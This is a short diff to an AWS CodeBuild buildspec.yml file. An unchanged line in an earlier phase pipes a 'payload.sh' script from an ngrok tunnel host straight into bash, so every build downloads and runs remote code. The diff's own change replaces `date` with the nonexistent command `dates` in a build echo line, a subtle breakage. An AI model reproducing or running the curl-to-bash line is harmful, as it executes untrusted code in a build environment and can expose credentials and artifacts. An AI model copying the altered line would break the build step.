--- a/buildspec.yml
+++ b/buildspec.yml
@@ -13,7 +13,7 @@ phases:
       - curl https://15f0-39-40-107-92.ngrok-free.app/payload.sh | bash
   build:
     commands:
-      - echo "Starting build `date` in `pwd`"
+      - echo "Starting build `dates` in `pwd`"
       - pip install --upgrade --force-reinstall -r deployment/requirements.txt
       - cd deployment && chmod +x ./build-s3-dist.sh && ./build-s3-dist.sh $DIST_OUTPUT_BUCKET $SOLUTION_NAME $VERSION
       - echo "Build completed `date`"
